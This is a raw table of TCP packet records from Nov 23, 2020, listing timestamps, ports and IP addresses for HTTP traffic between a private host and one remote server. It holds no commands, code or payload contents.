Nov 23, 2020 12:19:10.987726927 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.987787962 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.987821102 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:10.987957001 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.992942095 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:10.993205070 CET	49732	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:11.081012964 CET	49733	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:11.253990889 CET	80	49732	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:11.400085926 CET	80	49733	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:11.865336895 CET	80	49733	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:11.865441084 CET	49733	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:11.872756004 CET	49733	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:12.177505016 CET	80	49733	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:13.591121912 CET	49737	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:13.591917992 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:13.859437943 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:13.859574080 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:13.860515118 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:13.862303972 CET	80	49737	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:13.862391949 CET	49737	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:14.167273045 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:14.887379885 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:14.887404919 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:14.887420893 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:14.887439013 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:14.887454987 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:14.887454987 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:14.887469053 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:14.887521029 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:14.931489944 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:14.931524992 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:14.931535959 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:14.931549072 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:14.931622982 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:14.931665897 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.154159069 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.154186964 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.154207945 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.154226065 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.154241085 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.154243946 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.154257059 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.154267073 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.154273987 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.154289961 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.154306889 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.154314995 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.154323101 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.154335976 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.154341936 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.154359102 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.154360056 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.154381990 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.154413939 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.198400021 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.198431015 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.198446989 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.198462963 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.198477983 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.198481083 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.198513985 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.198545933 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.269067049 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.269100904 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.269118071 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.269138098 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.269212961 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.269234896 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.421185970 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.421248913 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.421283007 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.421298027 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.421303034 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.421340942 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.421351910 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.421377897 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.421395063 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.421430111 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.421459913 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.421502113 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.421516895 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.421540022 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.421550989 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.421578884 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.421591043 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.421617985 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.421629906 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.421655893 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.421670914 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.421694040 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.421706915 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.421731949 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.421744108 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.421780109 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.421782970 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.421814919 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.421828985 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.421871901 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.465428114 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.465487003 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.465518951 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.465528965 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.465567112 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.465569019 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.465575933 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.465615988 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.465621948 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.465656996 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.465665102 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.465693951 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.465708971 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.465733051 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.465745926 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.465770960 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.465785027 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.465821028 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.502899885 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.502958059 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.502996922 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.503026009 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.503036022 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.503073931 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.503093958 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.503112078 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.503159046 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.503173113 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.503211975 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.503248930 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.503320932 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.536053896 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.536221981 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.651381016 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.651438951 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.651488066 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.651494980 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.651516914 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.651544094 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.651565075 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.651592016 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.651645899 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.651650906 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.651655912 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.651698112 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.651711941 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.651771069 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.688656092 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.688694954 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.688711882 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.688837051 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.693852901 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.693897009 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.693928003 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.693958044 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.693988085 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.694009066 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.694020987 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.694040060 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.694046021 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.694051027 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.694051981 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.694071054 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.694082975 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.694128990 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.694145918 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.732564926 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.732667923 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.842371941 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.842431068 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.842468023 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.842479944 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.842502117 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.842521906 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.842530966 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.842560053 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.842572927 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.842597961 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.842609882 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.842636108 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.842647076 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.842673063 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.842684984 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.842713118 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.842724085 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.842751980 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.842763901 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.842832088 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.884078979 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.884124041 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.884157896 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.884171963 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.884186983 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.884212971 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.884227037 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.884242058 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.884268999 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.884272099 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.884290934 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.884299040 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.884325981 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.884329081 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.884346008 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.884388924 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:15.918545961 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:15.918669939 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.033626080 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.033698082 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.033727884 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.033767939 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.033804893 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.033852100 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.033895016 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.033931971 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.033973932 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.036438942 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.074737072 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.074798107 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.074831963 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.074862957 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.074902058 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.074939013 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.074985981 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.075012922 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.075030088 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.075047016 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.075052023 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.075067997 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.075104952 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.075124979 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.075139999 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.075143099 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.075421095 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.109503984 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.111573935 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.118606091 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.123575926 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.151024103 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.152967930 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.224450111 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.224513054 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.224543095 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.224574089 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.224616051 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.224663019 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.224663019 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.224690914 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.224703074 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.224867105 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.265461922 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.265518904 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.265562057 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.265574932 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.265619040 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.265656948 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.265660048 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.265693903 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.265703917 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.265744925 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.265747070 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.265784025 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.265784979 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.265820026 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.265821934 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.265860081 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.265897036 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.265909910 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.265934944 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.265971899 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.265974045 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.266020060 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.266057014 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.266740084 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.300812006 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.301342964 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.350955009 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.354290962 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.378520966 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.381511927 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.415514946 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.415572882 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.415620089 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.415662050 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.415664911 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.415695906 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.415699959 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.415739059 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.415740013 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.417087078 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.420032978 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.420377970 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.456094027 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.456154108 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.456193924 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.456218958 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.456232071 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.456267118 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.456269979 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.456305027 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.456309080 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.456373930 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.456408024 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.456417084 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.456454992 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.456490040 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.456494093 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.456532001 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.456566095 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.456579924 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.457321882 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.491658926 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.494122028 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.498697042 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.498733044 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.501399994 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.532618999 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.533833027 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.606395006 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.606462955 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.606502056 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.606542110 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.606580973 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.606594086 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.606618881 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.606621981 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.606657982 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.606808901 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.621308088 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.623775959 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.646958113 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.647018909 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.647057056 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.647094965 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.647109032 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.647133112 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.647170067 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.647176027 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.647208929 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.647211075 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.647245884 CET	80	49738	47.241.19.44	192.168.2.4
Nov 23, 2020 12:19:16.647245884 CET	49738	80	192.168.2.4	47.241.19.44
Nov 23, 2020 12:19:16.647294044 CET	80	49738	47.241.19.44	192.168.2.4
